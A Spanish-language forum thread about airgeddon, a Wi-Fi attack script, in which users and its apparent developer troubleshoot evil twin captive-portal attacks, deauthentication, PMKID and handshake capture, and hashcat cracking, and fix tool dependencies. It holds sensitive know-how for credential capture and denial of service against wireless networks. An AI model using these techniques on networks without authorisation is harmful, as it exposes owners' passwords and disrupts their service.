NOTA : el code es recogido PBC-master de Kdctv tenia algo mas pero bueno para pruebas y demas creo que es perfecto
----
edito

es que si es llamando a cada funcion no entiendo simplificando
Código: [Seleccionar]
###### CUSTOM FUNCTIONS ######
function plugin_template_override_somefunction() {
select_secondary_et_interface
exec_et_captive_portal_attack
}

###### FUNCTION HOOKING: PREHOOK ######
function select_secondary_et_interface {
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> "/tmp/supplicant.conf"
}

###### FUNCTION HOOKING: POSTHOOK ######
function exec_et_captive_portal_attack {
wpa_supplicant -c /tmp/supplicant.conf -D nl80211 -i ${secondary_wifi_interface} -B 2>/dev/null &
}

pero al parecer hay que tener cuidado
###### FUNCTION HOOKING: OVERRIDE ######
#Overridden function example
#This will replace an existing function in main airgeddon script to change its behavior in order to execute this content instead of the original

Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-04-2020, 09:23 (Jueves)
Los nombres de las funciones.... no están bien. No voy a mirar el código, lo siento, no tengo tiempo, pero sí te diré como se han de llamar las funciones para que funcione correctamente. Tal y como explica el fichero plugin_template.sh, dependiendo del nombre que le pongas al fichero, eso afectará a los nombres de las funciones que has de utilizar.

Ejemplo:
Si tu nombre de fichero se llama esto_es_un_plugin_de_prueba.sh , metes el fichero en la carpeta de plugins y entonces una función que haga prehook de la función original "select_secondary_et_interface" se tiene que llamar "esto_es_un_plugin_de_prueba_prehook_select_secondary_et_interface" . Es decir, el nombre de tu fichero quitando el .sh, luego _prehook_ y luego el nombre de la función original a la que quieres hacer el prehook. Y lo mismo para el overrride y el posthook. Si lees los comentarios del fichero plugin_template.sh está bien explicado.

Saludos y suerte!!!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 03-04-2020, 00:10 (Viernes)
no se si solo me pasara a mi pero intento meter el archivo con el pmkid  a un pendrive y no me deja y he probao con 2 pendrives.Me dice que no se puede escribir  ??? ???
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 03-04-2020, 00:32 (Viernes)
salu2
ya me ha pasao hablas de live ¿no?
de querer pasar algo a la usb y guardarlo y no dejarme
yo lo solucione una vez me valio renombrando el archivo a otro nombre mas sencillo
y la otra que aun asi ni renombrando porque tenia enlaces simbolicos tuve que crear xzm
pero vamos si es un cap o algo asi cambiandole el nombre al archivo por algo sencillo vale
--
el nombre del archivo contine -   ejemplo

mi-archivo-de-lo-que-sea.cap
a mi pasaba algo parecido con los cap
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 03-04-2020, 01:05 (Viernes)
noo,me pasa con wifislax instalado en el disco duro,el archivo que da airgeddon no hay manera de pasarlo a un pendrive.
Pd: si lo renombro por ejemplo a pmkid.txt si me deja  ???
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 04-04-2020, 04:03 (Sábado)
acabo de conseguir que hashcat rule solo con cpu ...instalando

pocl

http://portablecl.org/

Igual te interesa  , aunque supongo que lo logico es simplemente lanzar hashcat y ver si el ataque comienza o no ...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: rodypir en 04-04-2020, 19:20 (Sábado)
hola estimados tengo una consulta estoy probando la última versión de airgeddon en wifislax 2.0 , me arroja error hostapd-wpe, por lo que comentan la version correcta es la 2.7 que descargue de aqui, pero aplicando los comando de github no logro hacer una correcta instalación
tar -zxf hostapd-2.7.tar.gz
cd hostapd-2.7
patch -p1 < ../hostapd-wpe.patch (aca me arroja error)
cd hostapd

make
make install
make wpe

Creando certs
cd /etc/hostapd-wpe/certs
./bootstrap
make install  (arroja error)

me podrian orientar un poco gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-04-2020, 08:39 (Lunes)
@rodypir , no lo compiles tú. Utiliza el paquete que hizo USUARIONUEVO. Está colgado aquí: https://mega.nz/file/IQgzhIoD#7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU

Por cierto... hablando de plugins... mirad que plugin más chulo se ha currado alguien:

https://github.com/KeyofBlueS/airgeddon-plugins/blob/master/ui_boost.sh

Con este plugin (solo es copiar el fichero .sh a la carpeta plugins), acelera la forma en que se pintan los menús. Esto es útil si tienes un pc antiguo o si estás ejecutando airgeddon en un dispositivo ARM como una raspberry o similar donde se nota el rendimiento y que las pantallas se pintan un poco lento. El "truco" está en que el fichero que contiene todas las cadenas de idioma (el language_strings, que es un fichero muy grande) el plugin lo que hace es generar uno solo con las cadenas de texto del idioma que tengas seleccionado. Y con eso acelera el rendimiento bastante.

Me ha gustado y le puse un link en el Plugins Hall of Fame del Wiki.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: rodypir en 07-04-2020, 04:55 (Martes)
gracias v1s1t0r me habia complicado buscando info de como hacerlo y no había caso, por fin pude usar la última versión la encontré genial  >:(, me surgen algunas dudas estoy usando el ataque "evil twin AP con portal cautivo" no lograba desautentificar de ninguna forma los equipos pensando que mis adaptador wifi no eran compatibles, hasta que desactive la opción "modo persecución dos" y todo funcional
lo unico es que al momento comenzar el ataque me lanza error

(http://imgfz.com/i/T3dRCko.jpeg)


tal vez sea algun problema de algo que no he configurado bien pero la verdad es totalmente funcional
adjunto imagen de mis adaptadores


(http://imgfz.com/i/3TpNzt8.jpeg)


Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-04-2020, 18:31 (Martes)
Comentas cosas que no tienen que ver unas con otras... por una parte lo del DoS... a veces los clientes se desautentican y a veces no. No es una ciencia exacta... hay clientes que les afecta un tipo de ataque y a otros otro. Hay puntos de acceso más susceptibles y otros menos. La distancia y potencia también son importantes. Respecto al DoS pursuit mode, eso es para utilizar dos tarjetas a la vez y que mientras una realiza el falso AP y la desautenticación, otra escanea las redes en busca del AP por si lo cambian de canal. Recordemos que muchos APs tienen el canal configurado en "auto" y al darle un reinicio se cambia de canal dejando tu ataque DoS actuando en un canal en el que ya no hay nada... y con el DoS pursuit mode airgeddon detecta esto y si ve que se cambió de canal te avisa y lanza de nuevo el DoS en el nuevo canal persiguiendo por los canales al AP tantas veces como sea necesario. De ahí el nombre.

Respecto a tu otro error... se ve que tienes algún problema con las nftables... en tu caso utiliza mejor las iptables. Activa la opción desde el menú o modificando el fichero de configuración .airgeddonrc. Más info en el wiki, como siempre.... https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options

Título: Re:Script multiuso en bash, airgeddon
Publicado por: xumixurri en 09-04-2020, 18:38 (Jueves)
Hola v1s1t0r,

Yo en todas las últimas versiones de wifislax me da siempre el mismo error de syntax error que a rodypir. Recien iniciada el wifislax desde USB, sin tocar nada. Aparte, haciendo pruebas con mi red y mi password, no me lo reconoce. En "evil twin AP con portal cautivo" , cuando me conecto con el movil al portal fake e introduzco mi contraseña, siempre me dice que es incorrecta. Lo que noto, que mi password wifi es de 4 palabras separadas por espacios y en el script airgeddon me escribe el pass pero en vez de espacios me pone el simbolo del +.

No se colgar fotos en el foro. Lo comparto desde mi oneDrive.

https://1drv.ms/u/s!AkGoIF7dOAzi4jd763LcvZlAQQcu?e=Wia3KU (https://1drv.ms/u/s!AkGoIF7dOAzi4jd763LcvZlAQQcu?e=Wia3KU)

Aparte de esto modificaría en la rutina de evil twin con portal cautivo, para que si no consigues el handshake con un ataque (mdk4,etc.) , No tengas que volver al inicio a scanear redes de nuevo y repetir todo el preceso. Sino que vuelva a donde seleccionas de nuevo otro ataque de  desautentificacion ya que se hace muy engorroso.
Gracias de antemano.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: VER en 12-04-2020, 14:50 (Domingo)
Por cierto @dynyly me ha gustado mucho la forma esa de convertir con tshark de la captura del hcxdumptool a formato cap del que entiende aircrack. Lo he probado y funciona muy bien. Es muy posible que en una versión posterior (para la v10.11 ya tengo mucho trabajo)... pero igual para una versión 10.20 no descarto añadirlo y que tras la captura, además de dejarte el formato de hashcat te deje un cap que aircrack entienda... gracias!!!


https://github.com/v1s1t0r1sh3r3/airgeddon/tree/dev?files=1
 
Ya tenemos el convertidor
Título: Re:Script multiuso en bash, airgeddon
Publicado por: rodypir en 12-04-2020, 16:48 (Domingo)
Comentas cosas que no tienen que ver unas con otras... por una parte lo del DoS... a veces los clientes se desautentican y a veces no. No es una ciencia exacta... hay clientes que les afecta un tipo de ataque y a otros otro. Hay puntos de acceso más susceptibles y otros menos. La distancia y potencia también son importantes. Respecto al DoS pursuit mode, eso es para utilizar dos tarjetas a la vez y que mientras una realiza el falso AP y la desautenticación, otra escanea las redes en busca del AP por si lo cambian de canal. Recordemos que muchos APs tienen el canal configurado en "auto" y al darle un reinicio se cambia de canal dejando tu ataque DoS actuando en un canal en el que ya no hay nada... y con el DoS pursuit mode airgeddon detecta esto y si ve que se cambió de canal te avisa y lanza de nuevo el DoS en el nuevo canal persiguiendo por los canales al AP tantas veces como sea necesario. De ahí el nombre.

Respecto a tu otro error... se ve que tienes algún problema con las nftables... en tu caso utiliza mejor las iptables. Activa la opción desde el menú o modificando el fichero de configuración .airgeddonrc. Más info en el wiki, como siempre.... https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options



muchas gracias v1s1t0r todo funcionando, voy a incursionar en kali y ver que tal me va
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-04-2020, 13:57 (Lunes)
@VER, no hay convertidor aun... no está implementado. estoy haciendo otros cambios de momento en la v10.20

@xumixurri eso q comentas de q si no consigues el handshake vuelvas a un menú donde eliges el DoS de nuevo en lugar de tener que volver a escanear ya está hecho... así que no se muy bien a qué te refieres.... y respecto a lo de las passwords con espacios, juraría que eso funcionaba. Cuando tenga tiempo lo probaré por si a caso... pero me da a mi q algo raro tienes...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: xumixurri en 23-04-2020, 17:26 (Jueves)
@xumixurri eso q comentas de q si no consigues el handshake vuelvas a un menú donde eliges el DoS de nuevo en lugar de tener que volver a escanear ya está hecho... así que no se muy bien a qué te refieres.... y respecto a lo de las passwords con espacios, juraría que eso funcionaba. Cuando tenga tiempo lo probaré por si a caso... pero me da a mi q algo raro tienes...

Buenas. Si algo raro tengo, esta así ya en la iso Wifislax 2.0 final 64 bitas. la instalé al pen usb y la ejecuté. Y cada vez que reinicio carga la versión de serie de nuevo del pen. O sea que no se por donde puede ir el tema.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-04-2020, 09:56 (Viernes)
Hola gentes del hacking wifi... seguimos trabajando en la versión 10.20 de airgeddon que incluye cambios estructurales para que ahora las pantallas se pinten muchísimo más deprisa que antes! y otros cambios menores...

No obstante, tengo que pedir ayuda en un tema. Sobre todo a la gente que tengáis raspberry pi. Resulta que Debian ha quitado de sus repos algunos paquetes, entre ellos el paquete sslstrip. Por lo tanto, ha desaparecido también de parrot, kali y otras distros que son debian based. Como sabéis, es una dependencia de airgeddon que se usa en un tipo de ataque. Yo aquí tengo dos opciones, o bien retirar funcionalidades igual que retiran paquetes, o bien hacer esto que se me ha ocurrido:

https://github.com/v1s1t0r1sh3r3/airgeddon_deb_packages

Es un repo donde ir recopilando los paquetes deb que hacen falta. Los voy generando con dpkg-repack sobre los que tengo instalados. Si leeis el readme del repo, vereis que en 64 bits está todo, pero en arm faltan algunos.... y claro, no los puedo instalar porque ya han desaparecido. Si alguien tiene alguno que me falta de la lista que está allí, os agradecería que me ayudáseis a completarlo.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: radoman29 en 24-04-2020, 13:25 (Viernes)
Hola gentes del hacking wifi... seguimos trabajando en la versión 10.20 de airgeddon que incluye cambios estructurales para que ahora las pantallas se pinten muchísimo más deprisa que antes! y otros cambios menores...

No obstante, tengo que pedir ayuda en un tema. Sobre todo a la gente que tengáis raspberry pi. Resulta que Debian ha quitado de sus repos algunos paquetes, entre ellos el paquete sslstrip. Por lo tanto, ha desaparecido también de parrot, kali y otras distros que son debian based. Como sabéis, es una dependencia de airgeddon que se usa en un tipo de ataque. Yo aquí tengo dos opciones, o bien retirar funcionalidades igual que retiran paquetes, o bien hacer esto que se me ha ocurrido:

https://github.com/v1s1t0r1sh3r3/airgeddon_deb_packages

Es un repo donde ir recopilando los paquetes deb que hacen falta. Los voy generando con dpkg-repack sobre los que tengo instalados. Si leeis el readme del repo, vereis que en 64 bits está todo, pero en arm faltan algunos.... y claro, no los puedo instalar porque ya han desaparecido. Si alguien tiene alguno que me falta de la lista que está allí, os agradecería que me ayudáseis a completarlo.

Saludos.

Hola v1s1t0r

he encontrado bettercap 1.6.2 y he usado alien para pasar a deb vale o no?

links bettercap y hashcat:

https://www.mediafire.com/file/xar83ozs4rde5qs/bettercap_1.6.2-2_all.deb/file
https://www.mediafire.com/file/8a1kmdj1lssyinq/hashcat_5.1.0-2_all.deb/file

saludos chicos de wifislax  ;D ;D ;D ;D ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-04-2020, 13:55 (Viernes)
Puede ser... habría que probarlo, pero muchas gracias por el esfuerzo. Lo probaré.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: radoman29 en 24-04-2020, 20:43 (Viernes)
Puede ser... habría que probarlo, pero muchas gracias por el esfuerzo. Lo probaré.

Hola Funciona el deb o no ?

saludos chicos de Wifislax
Título: Re:Script multiuso en bash, airgeddon
Publicado por: radoman29 en 25-04-2020, 18:55 (Sábado)
hola v1s1t0r

he aquí el link del hashcat-utils convertido mediante alien.

http://www.mediafire.com/file/dvatrm9wthoij8g/hashcat-utils_1.9-2_all.deb/file

saludos chicos de Wifislax y Gracias por vuestro gran trabajo. >:( >:( >:( >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-05-2020, 12:06 (Domingo)
radoman29, el paquete hashcat-utils que has hecho funciona de lujo! pero el de hashcat aunque seguro que también funciona, no puedo instalarlo por problema de dependencias de versiones. Es decir, para que este hashcat se instale, además del hashcat-utils también depende del hashcat-data. El hashcat-data que yo tengo y que se puede obtener por apt en un raspbian normal es el 5.1.0+ds1-1 y tu hashcat está pidiendo >= 5.1.0+ds1-2 .... por los pelos... ¿puedes preparar un hashcat 5.1.0+ds1-1 en lugar de 5.1.0+ds1-2 ?? si no, intentaré conseguir el resto de paquetes para actualizar. Bueno, son las típicas peleas de dependencias cuando se usa dpkg... ya se sabe.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-05-2020, 12:12 (Domingo)
Nada, no he dicho nada... no me hagas caso. los paquetes que mandaste funcionan. es solo que yo tenía otro hashcat instalado, pero si lo quito y pongo los tuyos, todo ok. Sorry.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-05-2020, 12:37 (Domingo)
Bueno, muy rápido he hablado... me refería con todo ok a que ya se instala sin problemas... pero luego.... no tengo comando hashcat! es decir, que no está en /bin /usr/bin /usr/local/bin o cualquier otra ubicación del path. ni con locate ni con find soy capaz de encontrar el binario... así que este paquete hashcat que mandaste, sí, instalarse se instala... pero si luego no hay binario... no se, es muy raro. creo que el trapi del alien está bien para los paquetes que son dependencias, pero si un paquete luego es el que tiene el binario, por alguna razón, no está.... seguiré investigando.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 03-05-2020, 13:58 (Domingo)
para actualizar la  db , tienes que ejecutar primero

updatedb

y luego ya usa locate para buscar ..si tu haces updatedb , y luego instalas cosas las , pues como que adivino no es lovate , no los temdra en la db y no los va a mostrar  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-05-2020, 11:59 (Lunes)
ya ya, eso ya lo se... jejeje... uso locate y updatedb desde hace años. En serio, instalas el paquete y ni rastro del binario. eso del alien... a veces puede funcionar, pero en hashcat ya te digo yo que no chusca bien... una pena, era buen intento.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: VER en 09-06-2020, 09:36 (Martes)
Por fin tenemos https://github.com/v1s1t0r1sh3r3/airgeddon/tree/dev

Después de la captura de PMKID, ahora también puede transformar el archivo capturado en formato de archivo .cap aircrack-ng
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-06-2020, 22:09 (Lunes)
Si @VER, y también otros cambios y fixes menores. Acaba de publicarse ya en master la versión v10.21.

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 26-06-2020, 02:40 (Viernes)
salu2

He creado un plugin para airgeddon  me gustaria que lo probaran en mis pruebas el index modificado recogia clave y demas  si les de fallos comenten por favor
----actualizado----
eliminada actualizacion por posibles fallos hasta su correcion
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 26-06-2020, 11:18 (Viernes)
Hombre, es cierto que está muy enfocado a funcionar solo con Wifislax, y que solo está en español y tal... pero bueno, que está bien. Curioso para personalizar la página del portal cautivo. Me alegro de que el sistema de plugins te sirva para trastear y hacer cositas.  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-09-2020, 08:34 (Martes)
Hola, no entiendo bien... justo hace eso que comentas. Cuando vas a capturar un handshake que es necesario para lanzar el Evil Twin (en las últimas versiones también se puede con un pmkid), si no lo captura, te deja lanzar de nuevo el intento de capturar el handshake sin volver al menú inicial... es decir, que ya hace eso que comentas.

Por cierto, se está trabajando en la versión 10.30 que tiene algunos fixes además de la traducción al árabe.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 22-09-2020, 09:22 (Martes)
Hola.

A mí tampoco me lo hace, en versiones anteriores si me daba la opción de lanzar de nuevo el intento de capturar el handshake sin volver al menú inicial, en esta me manda directo al menú.

Precisamente lo he comprobado hace unos minutos testeando la nueva iso que ha subido USUARIONUEVO.

Por si necesitas reproducir el proceso para intentar localizar el fallo, los pasos que sigo son:

1.- Selecciono la interfaz wifi.

2.- La pongo en modo monitor.

3.- Menú 7 - 9 y si no se captura el handshake hay que volver al 9 para realizar el escaneo de nuevo.

Un saludo.

Pd. Uso ForceIpTables, por si fuese relevante, pero creo recordar que también lo hacía sin usarlas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 03-10-2020, 21:41 (Sábado)
Otra cosa que no hace ahora es reconocer los handshakes capturados en /usr/share/airgeddon/plugins/captured_handshakes
ahora siempre pide la ruta siempre,
pero en wifislax porque lo uso en otra y alli si que los detecta y te da a elegir.

cuando arranca a veces, no todas, me sale esto en consola antes que salga la into

grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida
grep: ./.airgeddonrc: Error de entrada/salida

y luego sigue "normal"

el error de entrada/salida , a mi me ha pasado a  veces si me ha movido el pincho usb y no me dado cuenta.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 04-10-2020, 00:58 (Domingo)
salu2
a mi detecta todo bien ...
humildemente yo veo /usr/share/airgeddon/plugins/    pero nada de hanskake  ahy van los plugins creados .... ¿ de que manera lo uso para que cree tal directorio ?

los hanskakes capturados y demas estan en /tmp/ 
 
Título: Re:Script multiuso en bash, airgeddon
Publicado por: xumixurri en 04-10-2020, 23:24 (Domingo)
Hola, no entiendo bien... justo hace eso que comentas. Cuando vas a capturar un handshake que es necesario para lanzar el Evil Twin (en las últimas versiones también se puede con un pmkid), si no lo captura, te deja lanzar de nuevo el intento de capturar el handshake sin volver al menú inicial... es decir, que ya hace eso que comentas.

Por cierto, se está trabajando en la versión 10.30 que tiene algunos fixes además de la traducción al árabe.

Saludos.

A mi me pasa lo que a waydehawai. Desde el menu de evil twin, si falla la captura del handshake no te envia a probar otro ataque, sino al menu principal de evil twin. Ya lo comente yo hace un tiempo.

Saludos
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 05-10-2020, 20:18 (Lunes)
he descubierto porque no van ciertas cosas,
le faltan un chorro de archivos en /usr/share/airgeddon
si se instala de nuevo con todos sus archivos ya no hace cosas raras,
menos lo de repetir ataque que sigue sin funcionar.

puede ser por que el script se actualiza ,pero creo que no baja los ficheros nuevos si hay alguno.

¿te pasa en wifislax?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 05-10-2020, 22:09 (Lunes)
si en wifislax en la mia no me pasa,
son solo unos scripts en la carpeta airgeddon se los pones y listo,

menos el tema de repetir ataque que todavia no va.

pues no se que scripts, yo los tengo todos en la version final ...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 05-10-2020, 23:25 (Lunes)
problemas en el paraiso


removed deprecated hcxpcaptool - use hcxpcapngtool

hcxtools-6.1.2

entonces cuando intentamos ataques pmkid

Código: [Seleccionar]
airgeddon.sh: línea 12048: hcxpcaptool: no se encontró la orden
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 05-10-2020, 23:51 (Lunes)
con cambiar el nombre del ejecutable no basta , los argumentos han cambiado

Código: [Seleccionar]
hcxpcapngtool: invalid option -- 'z'
de momento , lo que voy a hacer para fixear esto temporalmente es coger el ejecutable de la version 6.1.1 de hcxtools


QUE RARO , SI ARCHLINUX TAMBIEN ESTA ACTUALIZADO A ESA VERSION 6.1.2  ... 
https://www.archlinux.org/packages/community/x86_64/hcxtools/
Título: Re:Script multiuso en bash, airgeddon
Publicado por: lucaseo en 11-10-2020, 05:43 (Domingo)
Buenas! yo capturo el pmkid, me dice que me lo guarda por defecto en /root/(nombrearchivo).txt  voy al destino donde aparentemente me lo guardó y no encuentro el txt. Si le pongo que me transforme el archivo en .cap ahi si me lo guarda, pero en pmkid no. A que se puede deber el problema? saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-10-2020, 20:49 (Sábado)
Hola, acaba de salir airgeddon v10.30 con soporte de idioma árabe y algunos fixes.

Sí, ya he leído que va a cambiar el tema para lo del pmkid... me tengo que enterar bien de como irá... si no lo he entendido mal... sería algo así, corregidme si me equivoco:

hcxpcaptool está en el paquete hcxtools hasta cierta versión, pero ahora no va a estar... porque habrá otro binario ejecutable que lo sustituirá aunque cambiarán también las opciones para usarlo, no? ese binario es hcxpcapngtool, pero este binario en qué paquete estará? es decir, tendrá su propio paquete que se llamará como el binario? hcxpcapngtool?

Necesito saberlo de cara a organizar bien el tema de las dependencias... porque en algunas distros aun no ha llegado el cambio y al parecer en otras si y es un poco follón.

Luego está el tema de como hacer con el nuevo binario lo que hacía antes. La única línea en airgeddon que usa hcxpcaptool es esta (en un condicional):
Citar
if hcxpcaptool -z "${tmpdir}${standardpmkid_filename}" "${tmpdir}pmkid.pcapng" | grep -q "PMKID(s) written" 2> /dev/null; then
Habría que sustituirla por la magia nueva para que haga lo mismo.

Quien me echa un cable con todo esto? gracias!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-10-2020, 21:00 (Sábado)
el paquete es el mismo hcxtools , solo han renombrado ese ejecutable , y han cambiado algun argumento de uso.

el primer paquete donde esto sucede es hcxtools-6.1.2  , pero acaba de salir el 6.1.3 



el ultimo que aun mantine las cosas como estaban es el 6.1.1 , yo en particular para no romper nada ,de momento lo que he hecho es actualizarme , pero coger el ejecutable de la version 6.1.1  , como se llaman distinto no tengo problemas de sobreescribir uno con otro ... hasta que tengas una solucion oficial hare eso.


gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 18-10-2020, 08:21 (Domingo)
Hola, acaba de salir airgeddon v10.30 con soporte de idioma árabe y algunos fixes.

Hola.

He probado el airgeddon 10.30 y me sigue saltando al menú cuando no captura el handshake en el Evil Twin AP con portal cautivo (modo monitor requerido).

En versiones más antiguas si me daba la opción de lanzar de nuevo el intento de capturar el handshake sin volver al menú anterior, en esta y también en la anterior me manda directo a dicho menú, por lo que hay que realizar de nuevo el escaneo.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 10:21 (Domingo)
what?? cuando no capturas un handshake, que yo sepa te deja elegir otro posible ataque DoS y relanzar el ataque, pero no tienes que escanear nada... en teoría... lo pruebo.

Ups, tienes razón, en la última v10.30 cuando fallas al capturar el handshake te manda para atrás y tienes q volver a escanear... me va a tocar rebuscar en commits y versiones a ver donde se rompió eso para volverlo a poner. ¿Sabes a partir de q version ocurre?

Y respecto al nuevo binario, investigaré para ver como hacer lo mismo que hacía con hcxpcaptool. Es posible que acabe poniendo una dependencia doble. Es decir que detecte si tienes hcxpcaptool y que se haga como siempre y que si no tienes eso, pero tienes el otro binario también le valga y el comando cambie (aunque aún no he investigado como sería con el nuevo binario).

Gracias.

EDIT. Localizado... el problema es del cambio de la v10.10 a la v10.11. En la v10.10 sí que funcionaba bien lo de los menús y en la v10.11 por lo que sea ya vuelve al menú principal. Lo investigo a ver donde la lié... thanks por el report.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 12:00 (Domingo)
@pepe10000 ya está localizado y arreglado... menuda chorrada era. Este es el commit que lo arregla: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a267938ee862e96e15c095f02d3c6c6484e09ecb (https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a267938ee862e96e15c095f02d3c6c6484e09ecb)

El fix estará disponible en la próxima v10.31. Puedes bajar airgeddon de la rama "dev" y probarlo, verás que funciona ya bien. Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 12:38 (Domingo)
Respecto a la mandanga del PMKID, mejor preguntar directamente a los creadores... hemos abierto este issue:

https://github.com/ZerBea/hcxtools/issues/166 (https://github.com/ZerBea/hcxtools/issues/166)

P.D. Perdón por el re-post, que me emociono y luego me doy cuenta...  :-[
Título: Re:Script multiuso en bash, airgeddon
Publicado por: BENDER en 18-10-2020, 18:08 (Domingo)
hola

quiero hacer una pregunta a visitor, ¿el script es compatible con kali de 32 bits?, porque lo he ejecutado y algunos paquetes no los instala

SALU2
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 18-10-2020, 19:01 (Domingo)
@pepe10000 ya está localizado y arreglado... menuda chorrada era. Este es el commit que lo arregla: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a267938ee862e96e15c095f02d3c6c6484e09ecb (https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a267938ee862e96e15c095f02d3c6c6484e09ecb)

El fix estará disponible en la próxima v10.31. Puedes bajar airgeddon de la rama "dev" y probarlo, verás que funciona ya bien. Saludos!

Hola.

Descargado de la rama "dev", módulo creado, testeado y todo bien.

Ya funciona como antes y no hay que repetir el escaneo.

Un saludo y muchas gracias campeón.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 20:39 (Domingo)
Respecto a la mandanga del PMKID, mejor preguntar directamente a los creadores... hemos abierto este issue:

https://github.com/ZerBea/hcxtools/issues/166 (https://github.com/ZerBea/hcxtools/issues/166)

P.D. Perdón por el re-post, que me emociono y luego me doy cuenta...  :-[

por hablar que no sea, pero vamos, tampoco es un issue , le han metido mas funciones y lo han renombrado con lo de NG  "New Generation"  , se suele hacer much o y es un poco coñazo para la gente que depende de ellos , ya sea este u otro proyecto.

esperare a ver como acaba, pero ya te digo , que mas bien , acabaras intentando adaptar tu code, que el el suyo.  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 20:47 (Domingo)
me he leido el commit, y vamos , lo mismo que ya te habia dicho yo aqui  ...  dejan el nuevo y quitan el viejo , los argumentos cambian  ...


6.1.1 , es la ultima que aun tenia el hcxpcaptool  normal , en la 6.1.2 ya dejaron solo el nuevo ...y por supuesto no esperes que vayan a revertir eso ...

parece que oskar ya dio con el comando  , asi que ya tienes lo necesario para cocinar ...

un saludo y gracias por el trabajo.

Por cierto , que en archlinux tienen la 6.1.3 , lo digo por que creo que proporcionabais un paquete ya hecho ...  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 22:22 (Domingo)
Ale, ya están hechos todos los cambios... según nuestro issue https://github.com/v1s1t0r1sh3r3/airgeddon/issues/401 (https://github.com/v1s1t0r1sh3r3/airgeddon/issues/401) donde se ha hablado de como proceder, ya está cambiado el antiguo hcxpcaptool por el nuevo hcxpcapngtool. En el issue que le abrimos en el repo de hcxtools era solo para preguntarles, y ya se aclaró todo.

También hemos aprovechado para cambiar el tipo de hash generado. Antes el que se creaba se rompía con hashcat -m 16800 y ahora estamos usando el nuevo -m 2200. Parece que tiene una pequeña mejora de rendimiento a la hora de ser crackeado, así que ya lo hemos dejado todo "niquelao".

Los cambios entrarán para la próxima release v10.31 aunque ya se pueden disfrutar si descargais del github de airgeddon la rama dev.

Al final las dependencias se han quedado igual... es decir, que como hcxpcaptool estaba en hcxtools y el nuevo hcxpcapngtool forma parte del mismo paquete pues no he tenido que tocar ahi, solo cambiar los binarios y hacer los pertinentes cambios de comandos, validaciones y demás.

@pepe10000 yeah! ya te dije q estaba fixed, jejeje.

